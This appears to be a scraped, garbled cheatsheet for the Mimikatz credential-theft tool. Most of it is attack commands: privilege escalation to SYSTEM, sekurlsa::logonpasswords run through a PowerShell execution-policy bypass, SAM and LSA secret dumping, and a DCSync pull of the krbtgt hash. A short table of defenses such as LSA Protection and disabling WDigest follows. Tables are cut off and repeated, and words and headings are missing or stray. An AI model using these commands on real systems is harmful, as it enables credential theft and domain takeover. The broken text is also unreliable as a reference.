Mimikatz Cheatsheet ^hot^
| Command | Purpose | | :--- | :--- | | mimikatz.exe | Launch the tool (interactive mode). | | mimikatz # privilege::debug | Seeks . This is the "master key" to interact with LSASS. | | mimikatz # token::elevate | Elevates to SYSTEM account (often needed for LSASS access). | | mimikatz # exit | Exit the Mimikatz console. |
mimikatz.exe "privilege::debug" "token::elevate" "exit"
: Mimikatz commands are straightforward. Here are some essential ones: mimikatz cheatsheet
# Using Invoke-Mimikatz (from PowerSploit) powershell -exec bypass Import-Module .\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
| Command | Purpose | | :--- | :--- | | lsadump::sam | Dumps local SAM hashes (NTLM) from the registry. | | lsadump::sam /sam:FILE /system:FILE | Dump SAM from saved hive files (offline). | | lsadump::secrets | Dumps secrets from the SECURITY registry (e.g., cached domain logons). | | Command | Purpose | | :--- | :--- | | mimikatz
lsadump::dcsync /user:krbtgt — Mimics a Domain Controller to pull account hashes from Active Directory without touching the NTDS.dit file directly. Lateral Movement
| Defense | Why it Works | | :--- | :--- | | (Windows 10/11 + Server 2016+) | Runs LSASS as a virtualized protected process. Mimikatz cannot read its memory. | | Enable "Run as Protected Process" (LSA Protection) | Prevents privilege::debug from accessing LSASS. | | Disable WDigest (Registry key: UseLogonCredential =0) | Prevents storage of plaintext passwords in memory. | | Deploy EDR with LSASS Monitoring | EDR hooks OpenProcess and ReadProcessMemory calls on LSASS. | | Restrict Admin Logons (Tiering) | Prevent domain admin sessions on low-value workstations. | | | mimikatz # token::elevate | Elevates to
: This can be used to shift between different administrative tokens to test least-privilege configurations. token::elevate Use code with caution. 4. Defensive Best Practices